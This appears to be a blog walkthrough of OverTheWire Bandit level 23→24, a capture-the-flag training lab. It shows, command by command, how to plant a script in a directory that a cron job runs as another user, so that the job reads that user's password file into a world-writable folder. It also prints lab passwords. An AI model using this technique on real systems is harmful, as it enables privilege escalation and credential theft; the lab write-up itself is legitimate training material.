Skip to main content

Bandit Level 23 → 24

Shubham
Cybersecurity Enthusiast

Login: ssh bandit23@bandit.labs.overthewire.org -p 2220
Password: 0Zf11ioIjMVN551jX3CmStKLYqjk54Ga

task

A program is running automatically at regular intervals from cron. Look in /etc/cron.d/ for the configuration and see what command is being executed.

theory lil bit

  1. Cronjobs running as other users: The script is scheduled in /etc/cron.d to run as the bandit24 user. This means any commands executed by the script run with bandit24's privileges.
  2. File Ownership (stat -c "%U"): The cron script checks the owner of the files in a specific directory. It specifically looks for files owned by bandit23 to execute.
  3. Payload Execution: If the script finds a file owned by bandit23, it executes it. By writing a simple bash script that copies the password to a world-writable directory, we can trick bandit24 into doing the heavy lifting for us.
  4. Permissions (chmod 777): Since the script runs as bandit24, it needs permission to write the output file into our bandit23 temporary directory. Setting the directory permissions to 777 ensures this works.

solution

# 1. Check the cron configuration for bandit24
bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

# 2. Analyze the script logic
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
shopt -s nullglob

myname=$(whoami)

cd /var/spool/"$myname"/foo || exit
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
if [ "$i" != "." ] && [ "$i" != ".." ];
then
echo "Handling $i"
owner="$(stat --format "%U" "./$i")"
if [ "${owner}" = "bandit23" ] && [ -f "$i" ]; then
timeout -s 9 60 "./$i"
fi
rm -rf "./$i"
fi
done
# The script goes to /var/spool/bandit24/foo
# If it finds a file owned by bandit23, it executes it, then deletes it.

# 3. Create a temporary directory to work in
bandit23@bandit:/etc/cron.d$ mktemp -d
/tmp/tmp.RXCBGeylmO
bandit23@bandit:/etc/cron.d$ cd /tmp/tmp.RXCBGeylmO

# 4. Give read/write/execute permissions to everyone on the temp directory
# This allows bandit24 to write the password file here
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ chmod 777 .

# 5. Create the payload script to steal the password
# (Using nano or echo to write the script)
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ echo '#!/bin/bash' > bandit24.sh
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ echo 'cat /etc/bandit_pass/bandit24 > /tmp/tmp.RXCBGeylmO/password.txt' >> bandit24.sh

# 6. Make the script executable
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ chmod +rwx bandit24.sh

# 7. Copy the payload script into the target directory where the cronjob looks
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ cp bandit24.sh /var/spool/bandit24/foo/myscript.sh

# 8. Wait a minute for the cronjob to run, then check for the new password file
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ ls -la
total 180
drwxrwxrwx 2 bandit23 bandit23 4096 Apr 11 20:45 .
drwxrwx-wt 4284 root root 167936 Apr 11 20:45 ..
-rwxrwxr-x 1 bandit23 bandit23 77 Apr 11 20:43 bandit24.sh
-rw-rw-r-- 1 bandit24 bandit24 33 Apr 11 20:45 password.txt

# 9. Read the target password
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ cat password.txt
gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8

<!-- truncate -->